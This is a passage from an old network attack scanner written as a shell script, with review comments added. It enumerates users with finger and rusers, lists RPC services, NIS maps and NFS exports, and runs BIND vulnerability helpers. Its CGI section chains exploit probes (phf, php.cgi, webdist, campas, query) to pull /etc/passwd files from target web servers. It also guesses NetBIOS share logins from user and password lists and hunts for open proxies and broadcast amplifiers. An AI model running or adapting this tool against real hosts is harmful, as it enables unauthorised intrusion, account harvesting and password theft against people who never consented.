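     # Finger collection (needs 79/tcp in portscan.temp and $get_finger on).
     #   1. "finger @host" - the answer is kept in finger.temp for step 3.
     #   2. "finger -l" for the fixed accounts root and admin.
     #   3. "finger -l" for every login name found in the step 1 answer.
     # Lines containing "Permission denied" / "no such user" are left out of
     # the results file.
     #
     # The login names in step 3 come from the remote finger daemon, so they
     # are read line by line and passed quoted: a name made of glob characters
     # can no longer expand against local files, and a name starting with '-'
     # is skipped instead of being parsed as an option by the finger client.
     if grep "79/tcp" "$tmpdir/portscan.temp" > /dev/null && [ "$get_finger" = on ]
       then
           $fingerPATH "@$siteprocess" >> "$tmpdir/$siteprocess.fingerinfo"
           cp "$tmpdir/$siteprocess.fingerinfo" "$tmpdir/finger.temp"

           echo "Finger informations:" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"
           grep -v "Permission denied" "$tmpdir/$siteprocess.fingerinfo" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"

           rm "$tmpdir/$siteprocess.fingerinfo"

           for fingeraccount in root admin
              do
                $fingerPATH -l "$fingeraccount@$siteprocess" >> "$tmpdir/$siteprocess.fingerinfo"

                grep -v "Permission denied" "$tmpdir/$siteprocess.fingerinfo" | grep -v "no such user" >> "$scanDOMAIN.results"
                echo " " >> "$scanDOMAIN.results"

                rm "$tmpdir/$siteprocess.fingerinfo"
              done

           # Drop header and status lines, keep the first blank-separated
           # field of what is left and collapse adjacent duplicates.
           grep -v "$siteprocess" "$tmpdir/finger.temp" \
             | grep -v "Login" \
             | grep -v "No one logged on" \
             | grep -v "Permission denied" \
             | cut -d' ' --fields=-1 \
             | uniq -i > "$tmpdir/finger.temp2"
           rm "$tmpdir/finger.temp"

           # The list is read on descriptor 3 so the finger client keeps the
           # script's own stdin.
           while read -r ftemp <&3
              do
                case "$ftemp" in
                  ''|-*) continue ;;
                esac

                $fingerPATH -l "$ftemp@$siteprocess" > "$tmpdir/finger.temp"
                if ! grep "no such user" "$tmpdir/finger.temp" > /dev/null
                  then
                      cat "$tmpdir/finger.temp" >> "$scanDOMAIN.results"
                      echo " " >> "$scanDOMAIN.results"
                fi

                rm "$tmpdir/finger.temp"
              done 3< "$tmpdir/finger.temp2"

           rm "$tmpdir/finger.temp2"
     fi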
#---------------------------------------

#--------------RPC INFO
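     # RPC service listing (needs 111/tcp in portscan.temp and $rpc_info on).
     # The bundled portscan helper is run with -r and its output, minus the
     # "scanning host" line, is appended to the results file.
     # $tmpdir/$siteprocess.rpcinfo is deliberately left in place: the NIS and
     # RUSERS sections further down read it, and it is removed at the end of
     # the per-host pass.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if grep "111/tcp" "$tmpdir/portscan.temp" > /dev/null && [ "$rpc_info" = on ]
       then
            $extrabinPATH/portscan -r "$siteprocess" > "$tmpdir/$siteprocess.rpcinfo" 2>/dev/null
            echo "Collected RPC services informations:" >> "$scanDOMAIN.results"
            echo " " >> "$scanDOMAIN.results"
            grep -v "scanning host" "$tmpdir/$siteprocess.rpcinfo" >> "$scanDOMAIN.results"
            echo " " >> "$scanDOMAIN.results"

     fi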
#----------------------------------------------

#--------------NIS MAPS

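     # NIS map listing.  Runs only when the RPC listing was produced for this
     # host (111/tcp open and $rpc_info on), that listing mentions "yp", and
     # $nis_map is on.  The checks short-circuit in that order, so the rpcinfo
     # file is read only when the RPC section has created it.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if grep "111/tcp" "$tmpdir/portscan.temp" > /dev/null \
        && [ "$rpc_info" = on ] \
        && grep "yp" "$tmpdir/$siteprocess.rpcinfo" > /dev/null \
        && [ "$nis_map" = on ]
       then
           $extrabinPATH/portscan -n "$siteprocess" > "$tmpdir/$siteprocess.nisinfo" 2>/dev/null
           echo "Collected NIS maps infromations:" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"
           grep -v "scanning host" "$tmpdir/$siteprocess.nisinfo" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"

           rm "$tmpdir/$siteprocess.nisinfo"
     fi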

#-----------------------------------------------

#--------------REMOTEFS
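     # Exported file systems (needs 111/tcp in portscan.temp and $remote_fs
     # on).  "showmount -e" output is reported only when it contains an
     # "Export list" header; a line mentioning "everyone" or "anon clnt" adds
     # a one-line highlight before the listing.  The temp file is removed on
     # every path.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if grep "111/tcp" "$tmpdir/portscan.temp" > /dev/null && [ "$remote_fs" = on ]
       then
           $showmountPATH -e "$siteprocess" > "$tmpdir/$siteprocess.exports" 2>/dev/null

           if [ -e "$tmpdir/$siteprocess.exports" ]
             then
                 if grep "Export list" "$tmpdir/$siteprocess.exports" > /dev/null
                   then
                       if grep -e "everyone" -e "anon clnt" "$tmpdir/$siteprocess.exports" > /dev/null
                         then
                             echo "* Found (everyone) exportable dirs on $siteprocess" >> "$scanDOMAIN.results"
                       fi

                       echo "Exportable directories:" >> "$scanDOMAIN.results"
                       grep -v "Export list" "$tmpdir/$siteprocess.exports" >> "$scanDOMAIN.results"
                       echo " " >> "$scanDOMAIN.results"
                 fi

                 rm "$tmpdir/$siteprocess.exports"
           fi

     fi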

#--------------BIND STUFF
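     # Name server checks (need 53/tcp in portscan.temp).  Two bundled
     # helpers, bindinfo and bindvuln, write straight into the results file;
     # each is switched by its own option ($bind_ver, $bind_exploit) and
     # their stderr is discarded.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if grep "53/tcp" "$tmpdir/portscan.temp" > /dev/null
       then
           if [ "$bind_ver" = on ]
             then
                 echo "BIND version informations:" >> "$scanDOMAIN.results"

                 $extrabinPATH/bindinfo "$siteprocess" >> "$scanDOMAIN.results" 2>/dev/null
                 echo " " >> "$scanDOMAIN.results"

           fi

           if [ "$bind_exploit" = on ]
             then
                 echo "BIND vulnerability informations:" >> "$scanDOMAIN.results"

                 $extrabinPATH/bindvuln "$siteprocess" >> "$scanDOMAIN.results" 2>/dev/null
                 echo " " >> "$scanDOMAIN.results"
           fi
      fi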
#-------------------------------------------------

#--------------RUSERS COLLECT INFO
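     # rusers listing.  Needs $rusers_scan and $rpc_info on and 111/tcp open;
     # the last two are the same conditions under which the RPC section wrote
     # $tmpdir/$siteprocess.rpcinfo, which is searched here for an rusers
     # entry in either case.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if [ "$rusers_scan" = on ] && [ "$rpc_info" = on ] && grep "111/tcp" "$tmpdir/portscan.temp" > /dev/null
       then
           if grep -e "rusers" -e "RUSERS" "$tmpdir/$siteprocess.rpcinfo" > /dev/null
             then
                 $rusersPATH -la "$siteprocess" > "$tmpdir/$siteprocess.ruserstemp"
                 echo "Collected RUSERS informations:" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 cat "$tmpdir/$siteprocess.ruserstemp" >> "$scanDOMAIN.results"
                 echo " " >> "$scanDOMAIN.results"
                 rm "$tmpdir/$siteprocess.ruserstemp"
           fi
     fi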
#---------------------------------------------------------

#--------------CGI
     # CGI probing.  Runs only when 80/tcp is listed in portscan.temp and
     # $cgi_scan is on.  Every request is a "lynx -dump" of
     # http://<host><path>, where <path> is one of the variables defined in
     # the "CGI BUGS EXPLOIT DATA" section at the top of the file.
     #
     # For defenders: each probe is a plain HTTP GET whose path and query
     # string are the literal values of those variables, so they appear in
     # the target's web server access log as requests under /cgi-bin/ for
     # test-cgi, nph-test-cgi, phf, php.cgi, webdist.cgi, campas and query,
     # most of them with /etc/passwd in the query string.
     #
     # NOTE(review): the URLs are expanded unquoted and $testcgi/$nphtestcgi
     # end in "?*", so the shell attempts pathname expansion on them first.
     if ( cat $tmpdir/portscan.temp | grep "80/tcp" > /dev/null ) &&  [ "$cgi_scan" = on ]
       then

           echo "CGI scanning informations:" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results

           # The two test-cgi responses are copied to the results file
           # unconditionally, whatever the server answered.
           $lynxPATH -dump http://$siteprocess$testcgi > $tmpdir/$siteprocess.cgitemp
           echo "TEST CGI (if present) listing for cgi-bin directory" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           rm $tmpdir/$siteprocess.cgitemp

           $lynxPATH -dump http://$siteprocess$nphtestcgi > $tmpdir/$siteprocess.cgitemp
           echo "NPH TEST CGI (if present) listing for cgi-bin directory" >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
           echo " " >> $scanDOMAIN.results
           rm $tmpdir/$siteprocess.cgitemp
           
           # From here on the probes form a chain tried in a fixed order:
           # $phf, $php, $webdist, $campas, $phfyp, $query.  The chain stops
           # at the first response that contains "root:"; that response is
           # copied to the results file.  Each "else" below belongs to the
           # "if" directly above it, despite the indentation.
           #
           # NOTE(review): any response containing the text "root:" counts
           # as a hit; nothing checks that the body is passwd-formatted.
           # NOTE(review): these greps are not redirected, so matching lines
           # are also printed on the scanner's own stdout.
           $lynxPATH -dump http://$siteprocess$phf > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possibile passwd file from $siteprocess using PHF" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else

               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$php > $tmpdir/$siteprocess.cgitemp
               
               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using PHP" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$webdist > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using WEBDIST" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp
                             

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$campas > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using CAMPAS" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$phfyp > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using PHF and YPCAT" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               rm $tmpdir/$siteprocess.cgitemp
               $lynxPATH -dump http://$siteprocess$query > $tmpdir/$siteprocess.cgitemp

               if cat $tmpdir/$siteprocess.cgitemp | grep root:
                 then
                     echo "Got possible passwd file from $siteprocess using QUERY" >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     cat $tmpdir/$siteprocess.cgitemp >> $scanDOMAIN.results
                     echo " " >> $scanDOMAIN.results
                     rm $tmpdir/$siteprocess.cgitemp

           else
               # No probe matched: only the last temp file is left to remove.
               rm $tmpdir/$siteprocess.cgitemp
    
         # One "fi" per probe in the chain, innermost first.
         fi
         fi
         fi
         fi
         fi
         fi

    fi
#------------------------------------------

#--------------NETBIOS

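     # NetBIOS shares (needs 139/tcp in portscan.temp and $netbios_scan on).
     # The bundled nat helper is given an output file plus the two list files
     # ./userlist.nat and ./passlist.nat, both resolved against the current
     # directory; its own stdout is discarded and only the output file is
     # copied to the results.
     # Expansions are quoted so a host name or temp dir containing blanks or
     # glob characters stays one argument.
     if grep "139/tcp" "$tmpdir/portscan.temp" > /dev/null && [ "$netbios_scan" = on ]
       then
           echo "Shared NETBIOS resources:" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"

           $extrabinPATH/nat -o "$tmpdir/$siteprocess.shared" -u ./userlist.nat -p ./passlist.nat "$siteprocess" > /dev/null

           cat "$tmpdir/$siteprocess.shared" >> "$scanDOMAIN.results"
           echo " " >> "$scanDOMAIN.results"

           rm "$tmpdir/$siteprocess.shared"
     fi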
#--------------------------------------------

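    # End of the per-host pass.  Port 1080 is only reported, never probed.
    # Expansions are quoted so a host name or temp dir containing blanks or
    # glob characters stays one argument.
    if grep "1080/tcp" "$tmpdir/portscan.temp" > /dev/null
      then
          echo "Maybe a SOCKS FIREWALL (port 1080 open) is on the machine" >> "$scanDOMAIN.results"
          echo " " >> "$scanDOMAIN.results"
    fi

     # Record the host as processed.
     # NOTE(review): presumably read back when a scan is resumed - confirm
     # against the start-up code.
     echo "$siteprocess" >> "$scanDOMAIN.done"

     # Same condition under which the RPC section created the file.
     if grep "111/tcp" "$tmpdir/portscan.temp" > /dev/null && [ "$rpc_info" = on ]
       then
           rm "$tmpdir/$siteprocess.rpcinfo"
     fi

    rm "$tmpdir/portscan.temp"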

   done

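echo " "
echo "* Main scan finished"

# Whole-list passes that run once after the per-host loop: an open-proxy
# check with the bundled wgate helper and a broadcast-address check with ping.
#
# Fix in this version: the '[a-z]' pattern is quoted.  Unquoted, the shell
# treats it as a glob, and a one-letter file name in the current directory
# would silently replace the pattern.  File and host expansions are quoted
# as well; command-path variables stay unquoted so an empty one (for
# example $nohupPATH) still disappears from the command line.
if [ "$wingate_scan" = on ] || [ "$bcast_scan" = on ]
  then
      # NOTE(review): this test reads $singleisON while the broadcast test
      # below reads $singleis - confirm which name the option parser sets.
      if [ "$wingate_scan" = on ] && [ ! "$singleisON" = on ]
        then
            echo "* Scanning for open Wingates, sockets or Netproxies"

            echo "Wingates, sockets or Netproxies in $scanDOMAIN:" >> "$scanDOMAIN.results"
            echo " " >> "$scanDOMAIN.results"

            # NOTE(review): the helper is told to write
            # $tmpdir/$mainLISTwgatez.wingates, but the file read and removed
            # below is $tmpdir/$mainLIST.wingates; whether those are the same
            # file depends on values set outside this part of the script.
            $nohupPATH $extrabinPATH/wgate "$mainLISTwgatez" "$tmpdir/$mainLISTwgatez.wingates" > /dev/null

            grep -v "Wingate Seeker by KByte" "$tmpdir/$mainLIST.wingates" \
              | grep -v "List of wingates" >> "$scanDOMAIN.results"
            echo " " >> "$scanDOMAIN.results"

            rm "$tmpdir/$mainLIST.wingates"
      fi

      if [ "$bcast_scan" = on ] && [ ! "$singleis" = on ]
        then
            echo "* Scanning for broadcasts"

            echo "Scanning for valid broadcasts in domain" >> "$scanDOMAIN.results"
            echo " " >> "$scanDOMAIN.results"

            # Reduce every list entry to its first three dot-separated
            # fields, then sort and drop duplicates.
            for bscan in `cat "$mainLISTwgatez"`
               do
                 echo "$bscan" | cut -d'.' --fields=-3 >> "$tmpdir/bscan.temp"
               done

            sort "$tmpdir/bscan.temp" > "$tmpdir/bscan.temp1"
            rm "$tmpdir/bscan.temp"
            uniq -i "$tmpdir/bscan.temp1" > "$tmpdir/bscan.temp"
            rm "$tmpdir/bscan.temp1"

            # Entries that still contain a lower-case letter are host names,
            # not dotted quads, and are filtered out.
            if grep '[a-z]' "$tmpdir/bscan.temp" > /dev/null
              then
                  echo "* Filtering out non-dotted quad IPs..."
                  grep -v '[a-z]' "$tmpdir/bscan.temp" > "$tmpdir/bscan.temp1"
                  rm "$tmpdir/bscan.temp"
                  mv "$tmpdir/bscan.temp1" "$tmpdir/bscan.temp"
            fi

            # -s is false for a missing file as well as for an empty one.
            if [ ! -s "$tmpdir/bscan.temp" ]
              then
                  echo "* Filtered file does not contain dotted quad IPs... skipping"
                  rm "$tmpdir/bscan.temp" 2>/dev/null
            else
                # For each three-octet prefix, ping the .255 and then the .0
                # address twice; a ping summary mentioning "duplicates" is
                # recorded together with its third comma-separated field.
                for bping in `cat "$tmpdir/bscan.temp"`
                   do
                     for bsuffix in 255 0
                        do
                          $pingPATH -c 2 "$bping.$bsuffix" > "$tmpdir/bcast.restemp" 2>/dev/null
                          if grep "duplicates" "$tmpdir/bcast.restemp" > /dev/null
                            then
                                echo -n "[Broadcast $bping.$bsuffix]" >> "$scanDOMAIN.results"
                                grep duplicates "$tmpdir/bcast.restemp" | cut -d',' --fields=3 >> "$scanDOMAIN.results"
                                echo " " >> "$scanDOMAIN.results"
                          fi
                          rm "$tmpdir/bcast.restemp"
                        done
                   done

                rm "$tmpdir/bscan.temp"
            fi
      fi
fi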

# -------- PLUGINS ON GLOBAL LIST -------------

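# Plugins configured to run once on the whole host list.
#
# For every name in $tmpdir/plugins.listrun the descriptor
# $tmpdir/<name>.plugin supplies the plugin file (_file), its parameter
# words (_params) and the user type it needs (_level).  A plugin whose level
# equals $userTYPE is sourced in a subshell as
#     . <pluginsDIR>/<file> <arguments...>
# with the placeholder words completeLIST, currentHOST, resultsFILE,
# pluginsDIRECTORY, temporaryDIR and completeIPLIST replaced by the matching
# script variables; any other word is passed through unchanged.
#
# Changes from the previous version:
#   * the argument list is built in the positional parameters of the
#     subshell instead of being appended to two temp files, so leftovers of
#     an interrupted run can no longer end up at the front of the next
#     plugin's command line;
#   * globbing is off while the list is built, so a parameter such as "*"
#     is passed literally instead of expanding to local file names;
#   * $userTYPE and all file names are quoted.
# Substituted values are still split into words exactly as before.
#
# NOTE(review): plugins are sourced, not executed, so they run with every
# variable and privilege of this script; the descriptors and $pluginsDIR
# must only be writable by the user running the scan.
# NOTE(review): this section runs after the per-host loop, so currentHOST
# presumably resolves to whatever host that loop handled last - confirm.
if [ "$use_plugins" = on ] && [ -e "$tmpdir/plugins.listrun" ]
  then
      echo " "
      echo "* Running plugins on the main ip list"
      echo " "

      for execplugin in $(cat "$tmpdir/plugins.listrun")
         do
           plugFILE=$(grep "_file" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)
           plugPARAMS=$(grep "_params" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)
           plugLEVEL=$(grep "_level" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)

           if [ "$plugLEVEL" = "$userTYPE" ]
             then
                 (
                   set -f
                   set -- "$pluginsDIR/$plugFILE"

                   for pluginparameter in $plugPARAMS
                      do
                        case "$pluginparameter" in
                          completeLIST)     pluginvalue=$mainLIST ;;
                          currentHOST)      pluginvalue=$siteprocess ;;
                          resultsFILE)      pluginvalue=$scanDOMAIN.results ;;
                          pluginsDIRECTORY) pluginvalue=$pluginsDIR ;;
                          temporaryDIR)     pluginvalue=$tmpdir ;;
                          completeIPLIST)   pluginvalue=$mainLISTip ;;
                          *)                pluginvalue=$pluginparameter ;;
                        esac

                        # Unquoted on purpose: keeps the old word splitting
                        # (an empty value adds no argument); globbing is off.
                        set -- "$@" $pluginvalue
                      done

                   set +f

                   # Kept for plugins that read the assembled command line.
                   pluginEXEC="$*"

                   . "$@"
                 )
           fi

         done
fi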

#--------------------------------------

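# End-of-scan bookkeeping: drop the progress files, stamp the results file
# with the finishing time and, when $tar_results is on, pack the files that
# share the $scanDOMAIN prefix.
# NOTE(review): .done receives one host name per processed host in the main
# loop; the role of .resume and .resumelist is not visible in this part of
# the script.
# File names are quoted so a scan name containing blanks or glob characters
# stays one argument; only the trailing ".*" is left to the shell on purpose.
rm "$scanDOMAIN.done"
rm "$scanDOMAIN.resume"

if [ -e "$scanDOMAIN.resumelist" ]
  then
      rm "$scanDOMAIN.resumelist"
fi

echo -n "Scan finished on: " >> "$scanDOMAIN.results"
date >> "$scanDOMAIN.results"
echo " " >> "$scanDOMAIN.results"

if [ "$tar_results" = on ]
  then
      echo -n "Creating .TAR.GZ archive of the results... "
      # The glob is expanded before tar starts, so an archive left by an
      # earlier run with the same scan name is part of the member list.
      $tarPATH --create --gzip --file "$scanDOMAIN.tar.gz" "$scanDOMAIN".*
      echo "done"
fi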

# -------- PLUGINS CONFIGURED AS 'POST' -------------

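# Plugins configured to run at the very end of the scan.
#
# For every name in $tmpdir/plugins.postrun the descriptor
# $tmpdir/<name>.plugin supplies the plugin file (_file), its parameter
# words (_params) and the user type it needs (_level).  A plugin whose level
# equals $userTYPE is sourced in a subshell as
#     . <pluginsDIR>/<file> <arguments...>
# with the placeholder words completeLIST, currentHOST, resultsFILE,
# pluginsDIRECTORY, temporaryDIR and completeIPLIST replaced by the matching
# script variables; any other word is passed through unchanged.
#
# Changes from the previous version:
#   * the argument list is built in the positional parameters of the
#     subshell instead of being appended to two temp files, so leftovers of
#     an interrupted run can no longer end up at the front of the next
#     plugin's command line;
#   * globbing is off while the list is built, so a parameter such as "*"
#     is passed literally instead of expanding to local file names;
#   * $userTYPE and all file names are quoted.
# Substituted values are still split into words exactly as before.
#
# NOTE(review): plugins are sourced, not executed, so they run with every
# variable and privilege of this script; the descriptors and $pluginsDIR
# must only be writable by the user running the scan.
# NOTE(review): by this point the progress files have been removed and the
# results may already have been archived, so a plugin that writes to
# resultsFILE changes the file after the archive was taken.
if [ "$use_plugins" = on ] && [ -e "$tmpdir/plugins.postrun" ]
  then
      echo " "
      echo "* Running plugins at the end of scan"
      echo " "

      for execplugin in $(cat "$tmpdir/plugins.postrun")
         do
           plugFILE=$(grep "_file" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)
           plugPARAMS=$(grep "_params" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)
           plugLEVEL=$(grep "_level" "$tmpdir/$execplugin.plugin" | cut -d'=' --fields=2)

           if [ "$plugLEVEL" = "$userTYPE" ]
             then
                 (
                   set -f
                   set -- "$pluginsDIR/$plugFILE"

                   for pluginparameter in $plugPARAMS
                      do
                        case "$pluginparameter" in
                          completeLIST)     pluginvalue=$mainLIST ;;
                          currentHOST)      pluginvalue=$siteprocess ;;
                          resultsFILE)      pluginvalue=$scanDOMAIN.results ;;
                          pluginsDIRECTORY) pluginvalue=$pluginsDIR ;;
                          temporaryDIR)     pluginvalue=$tmpdir ;;
                          completeIPLIST)   pluginvalue=$mainLISTip ;;
                          *)                pluginvalue=$pluginparameter ;;
                        esac

                        # Unquoted on purpose: keeps the old word splitting
                        # (an empty value adds no argument); globbing is off.
                        set -- "$@" $pluginvalue
                      done

                   set +f

                   # Kept for plugins that read the assembled command line.
                   pluginEXEC="$*"

                   . "$@"
                 )
           fi

         done

fi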

# ---------------------------------------------------

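# Remove the scratch directory.  The expansion is quoted, guarded against an
# empty value and preceded by "--", so blanks, glob characters or a leading
# dash in $tmpdir can never turn the recursive delete towards another path
# or be read as an option.
if [ -n "$tmpdir" ]
  then
      rm -rf -- "$tmpdir"
fi

# Terminal bell, then the closing messages.
echo -e "\a"

echo "* Results saved in file $scanDOMAIN.results"
echo "* --- All done! sWEETM+NT rulez ---"
echo " "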